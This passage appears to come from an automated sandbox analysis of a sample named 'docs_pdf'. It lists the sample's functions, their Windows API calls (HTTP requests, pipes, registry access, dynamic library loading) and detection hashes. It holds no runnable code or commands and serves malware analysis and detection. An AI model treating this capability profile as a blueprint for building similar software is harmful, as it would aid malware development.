                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01076890,00000000), ref: 01012D5A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Menu$Delete$InfoItem_memset
                                    • String ID: 0
                                    • API String ID: 1173514356-4108050209
                                    • Opcode ID: b8b88cdf058683fb0be1a81ab703cf330a348b34f01c173bf596537f6deffbda
                                    • Instruction ID: 3f8d42006286425534fd7be721920e6566b25ae6330ca66503bb03ad20ada4c1
                                    • Opcode Fuzzy Hash: b8b88cdf058683fb0be1a81ab703cf330a348b34f01c173bf596537f6deffbda
                                    • Instruction Fuzzy Hash: 0741AE302043429FD720EF28C844B5ABBE8EF85320F24465EFAA5972D5D778E504CB92
                                    Function 01009372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                      • Part of subcall function 0100B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0100B0E7
                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 010093F6
                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 01009409
                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 01009439
                                      • Part of subcall function 00FB7D2C: _memmove.LIBCMT ref: 00FB7D66
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$_memmove$ClassName
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 365058703-1403004172
                                    • Opcode ID: bf38d69025bdc1d9e12313abed37053412c232e0f564237ea017418601bbb40f
                                    • Instruction ID: 89e971913c78a50178d009ed4cb8e049d47b150d814c9efc27e663b7887e0b0f
                                    • Opcode Fuzzy Hash: bf38d69025bdc1d9e12313abed37053412c232e0f564237ea017418601bbb40f
                                    • Instruction Fuzzy Hash: C5212671900104BFEB15AB75CC85CFEBBBCDF45354F114119F9A5972E1DF3909099A10
                                    Function 00FB410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00FED5EC
                                      • Part of subcall function 00FB7D2C: _memmove.LIBCMT ref: 00FB7D66
                                    • _memset.LIBCMT ref: 00FB418D
                                    • _wcscpy.LIBCMT ref: 00FB41E1
                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FB41F1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                    • String ID: Line:
                                    • API String ID: 3942752672-1585850449
                                    • Opcode ID: d0c7eff8c20814fb9361234b5f8776a10a54cba961dc6060e4aa5c5785823e66
                                    • Instruction ID: 204672fcc69e67744b4868179de046f418e438fb3e6c975e2f4ee76b72710cbe
                                    • Opcode Fuzzy Hash: d0c7eff8c20814fb9361234b5f8776a10a54cba961dc6060e4aa5c5785823e66
                                    • Instruction Fuzzy Hash: 7B31ED71808701AAE361EB65DC46BDA77ECAF84300F00451EB185A2092EF79A649EF92
                                    Function 01021B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 01021B40
                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01021B66
                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 01021B96
                                    • InternetCloseHandle.WININET(00000000), ref: 01021BDD
                                      • Part of subcall function 01022777: GetLastError.KERNEL32(?,?,01021B0B,00000000,00000000,00000001), ref: 0102278C
                                      • Part of subcall function 01022777: SetEvent.KERNEL32(?,?,01021B0B,00000000,00000000,00000001), ref: 010227A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                    • String ID:
                                    • API String ID: 3113390036-3916222277
                                    • Opcode ID: 2030c4f3b056edc857b8befe877a72675d4af2bf6120a9a66436051e37854b5e
                                    • Instruction ID: 8f39ba160e675d6918c1e2bec8b76474419c601f068e409dbdc9bcdb11e7a0d4
                                    • Opcode Fuzzy Hash: 2030c4f3b056edc857b8befe877a72675d4af2bf6120a9a66436051e37854b5e
                                    • Instruction Fuzzy Hash: 8A21CDB1604219BFEB229F649C85EBF76FCFB49644F00412AF585E3240EB759D0487A1
                                    Function 01036656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FB1D73
                                      • Part of subcall function 00FB1D35: GetStockObject.GDI32(00000011), ref: 00FB1D87
                                      • Part of subcall function 00FB1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FB1D91
                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 010366D0
                                    • LoadLibraryW.KERNEL32(?), ref: 010366D7
                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 010366EC
                                    • DestroyWindow.USER32(?), ref: 010366F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                    • String ID: SysAnimate32
                                    • API String ID: 4146253029-1011021900
                                    • Opcode ID: 39eece59e35f73fde77ec22a49585b5b06d51a81be8b0692aeda4b36dfe4d138
                                    • Instruction ID: c05a3d8bcf8164e5bea284905dd9268a88c0132694f55bc22482cebd55aaca30
                                    • Opcode Fuzzy Hash: 39eece59e35f73fde77ec22a49585b5b06d51a81be8b0692aeda4b36dfe4d138
                                    • Instruction Fuzzy Hash: 4821CD71200206BFEF124E68EC80EBB77EDFB8D3A4F504629FA9096091D773C950A760
                                    Function 0101710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetStdHandle.KERNEL32(000000F6), ref: 0101712B
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0101715D
                                    • GetStdHandle.KERNEL32(000000F6), ref: 0101716E
                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 010171A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CreateHandle$FilePipe
                                    • String ID: nul
                                    • API String ID: 4209266947-2873401336
                                    • Opcode ID: eca63f0afae58183a91d11276e0972dc979319d2023ccc7659a41ecae01e5f6b
                                    • Instruction ID: fa9af78c444bac507f94a10ceb4607e2b9dec2a1b4f36e67357fe611b43aee88
                                    • Opcode Fuzzy Hash: eca63f0afae58183a91d11276e0972dc979319d2023ccc7659a41ecae01e5f6b
                                    • Instruction Fuzzy Hash: 3221B071A00206ABDB209F6C9C04AAABBE9BF55730F200A59FDE1D72C8D7B59441CB61
                                    Function 0101703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetStdHandle.KERNEL32(0000000C), ref: 0101705E
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01017091
                                    • GetStdHandle.KERNEL32(0000000C), ref: 010170A3
                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 010170DD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CreateHandle$FilePipe
                                    • String ID: nul
                                    • API String ID: 4209266947-2873401336
                                    • Opcode ID: ced38eeec40e15c0a72341935d0a1df7142f43b7d4c8e93bcae746fa8a6ee70f
                                    • Instruction ID: cce018f9860ed772db9a9c041cd1377e23dc9f3676ba13738e892d4569f6df3b
                                    • Opcode Fuzzy Hash: ced38eeec40e15c0a72341935d0a1df7142f43b7d4c8e93bcae746fa8a6ee70f
                                    • Instruction Fuzzy Hash: B721817850030AEBDB219F28DC04A9A7BE8AF44720F204A59FDE0D72D8D7B5A8508B50
                                    Function 0101AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 0101AEBF
                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0101AF13
                                    • __swprintf.LIBCMT ref: 0101AF2C
                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,0103F910), ref: 0101AF6A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ErrorMode$InformationVolume__swprintf
                                    • String ID: %lu
                                    • API String ID: 3164766367-685833217
                                    • Opcode ID: 4447f5c87769a680d12e90a3a77742206245fc80d13b28ddcbc7c848ff58369c
                                    • Instruction ID: 670baa409f06fe08abcf48e470f5fa8c8e22b64cc1a66685536a2a27b50e835e
                                    • Opcode Fuzzy Hash: 4447f5c87769a680d12e90a3a77742206245fc80d13b28ddcbc7c848ff58369c
                                    • Instruction Fuzzy Hash: 04217130A00209AFCB10EF65DC85EEE7BBCEF89704B004069F949EB251DB75EA41DB21
                                    Function 0100A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB7D2C: _memmove.LIBCMT ref: 00FB7D66
                                      • Part of subcall function 0100A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0100A399
                                      • Part of subcall function 0100A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0100A3AC
                                      • Part of subcall function 0100A37C: GetCurrentThreadId.KERNEL32 ref: 0100A3B3
                                      • Part of subcall function 0100A37C: AttachThreadInput.USER32(00000000), ref: 0100A3BA
                                    • GetFocus.USER32 ref: 0100A554
                                      • Part of subcall function 0100A3C5: GetParent.USER32(?), ref: 0100A3D3
                                    • GetClassNameW.USER32(?,?,00000100), ref: 0100A59D
                                    • EnumChildWindows.USER32(?,0100A615), ref: 0100A5C5
                                    • __swprintf.LIBCMT ref: 0100A5DF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                    • String ID: %s%d
                                    • API String ID: 1941087503-1110647743
                                    • Opcode ID: 3949ca57c8372915a6a06dcd65dc015c9bf2c81aebe660a2eff1ca24073a01c4
                                    • Instruction ID: c7b69f0b5ea53761c7a616e07b6d9657ff2ca7f62bbf077594b15e51982ea557
                                    • Opcode Fuzzy Hash: 3949ca57c8372915a6a06dcd65dc015c9bf2c81aebe660a2eff1ca24073a01c4
                                    • Instruction Fuzzy Hash: 6011A571600306ABEF127F75DC85FEE377C9F8C700F004065B948AB182CA7559459B75
                                    Function 01012017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 01012048
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                    • API String ID: 3964851224-769500911
                                    • Opcode ID: 995cf6c676ee77debcc37bf819ae59ca484d90f733c9fa0b64bf8ce67ce53510
                                    • Instruction ID: f96213714829fd2aadd21c99e9dea2ceab1a4ad1ae909fb8f797e34c0887c5f0
                                    • Opcode Fuzzy Hash: 995cf6c676ee77debcc37bf819ae59ca484d90f733c9fa0b64bf8ce67ce53510
                                    • Instruction Fuzzy Hash: FE113C3090010ACFCF01EFA4DD415EEB7BABF05304B10859AE8956B357DB3A6906DB50
                                    Function 0102EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0102EF1B
                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0102EF4B
                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0102F07E
                                    • CloseHandle.KERNEL32(?), ref: 0102F0FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                    • String ID:
                                    • API String ID: 2364364464-0
                                    • Opcode ID: 7c84f9706e346d295b42d4ae578adcffb3496dbcb6d8b9e07ea99263c18e110a
                                    • Instruction ID: ce288290317b302a1bb7d3036ce86b62ec5ee51fc58deade16c664ab9d396e57
                                    • Opcode Fuzzy Hash: 7c84f9706e346d295b42d4ae578adcffb3496dbcb6d8b9e07ea99263c18e110a
                                    • Instruction Fuzzy Hash: 3A8192716043119FD720EF29CC86F6AB7E9AF88710F04881DF699DB292DBB5A841DF41
                                    Function 010302C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                      • Part of subcall function 010310A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,01030038,?,?), ref: 010310BC
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01030388
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 010303C7
                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0103040E
                                    • RegCloseKey.ADVAPI32(?,?), ref: 0103043A
                                    • RegCloseKey.ADVAPI32(00000000), ref: 01030447
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                    • String ID:
                                    • API String ID: 3440857362-0
                                    • Opcode ID: 518d97afae49dfd8968a2b24fad39c838bb8a14f91cc93a17b64ba71a88c2518
                                    • Instruction ID: 5e0a4b0a6ed9a2106cdaba6e203542736ed738fd04c375b8baade8518fa324bd
                                    • Opcode Fuzzy Hash: 518d97afae49dfd8968a2b24fad39c838bb8a14f91cc93a17b64ba71a88c2518
                                    • Instruction Fuzzy Hash: AC513671208205AFD704EF69CC81FAEB7ECAF88704F04896DB595872A1DB75E904DB52
                                    Function 0102DBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB9997: __itow.LIBCMT ref: 00FB99C2
                                      • Part of subcall function 00FB9997: __swprintf.LIBCMT ref: 00FB9A0C
                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0102DC3B
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0102DCBE
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0102DCDA
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0102DD1B
                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0102DD35
                                      • Part of subcall function 00FB5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01017B20,?,?,00000000), ref: 00FB5B8C
                                      • Part of subcall function 00FB5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01017B20,?,?,00000000,?,?), ref: 00FB5BB0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                    • String ID:
                                    • API String ID: 327935632-0
                                    • Opcode ID: e3968a33e7712a671daf5db70f01b16238a7b65e14de142aa6060e09ec7efa13
                                    • Instruction ID: 75361127d1c198116216416a6598b27de513164fbd432186d7333206d6e10de3
                                    • Opcode Fuzzy Hash: e3968a33e7712a671daf5db70f01b16238a7b65e14de142aa6060e09ec7efa13
                                    • Instruction Fuzzy Hash: C6515B75A0061A9FCB01EFA8C884DADB7F8FF49310B148099E955AB322D779AD45CF81
                                    Function 0101E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0101E88A
                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0101E8B3
                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0101E8F2
                                      • Part of subcall function 00FB9997: __itow.LIBCMT ref: 00FB99C2
                                      • Part of subcall function 00FB9997: __swprintf.LIBCMT ref: 00FB9A0C
                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0101E917
                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0101E91F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                    • String ID:
                                    • API String ID: 1389676194-0
                                    • Opcode ID: 4a65f141193f44735429f3b94d755e18e25a3c5c77f903ce9d9b3f15457974ce
                                    • Instruction ID: 644f51fca9ae048cfd1642a713b75fc9269d92965bb70934731d74713dea015f
                                    • Opcode Fuzzy Hash: 4a65f141193f44735429f3b94d755e18e25a3c5c77f903ce9d9b3f15457974ce
                                    • Instruction Fuzzy Hash: 79513735A00205EFCB01EF65C981AAEBBF5FF08310B148099E949AB362CB79ED11DF51
                                    Function 0103A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 949b5ed1061656572dc7f05937def131d4b870722939b79691886fa3b8b7ed98
                                    • Instruction ID: d6ebcc554448a451c818708336ba5d25d117da2dfe8e0c4bcfaa471018fb7a1c
                                    • Opcode Fuzzy Hash: 949b5ed1061656572dc7f05937def131d4b870722939b79691886fa3b8b7ed98
                                    • Instruction Fuzzy Hash: 0B41A275E00104EFE760DA28C848FA9BBACEB8A310F0481A5FAD6E72D1D7759941CB50
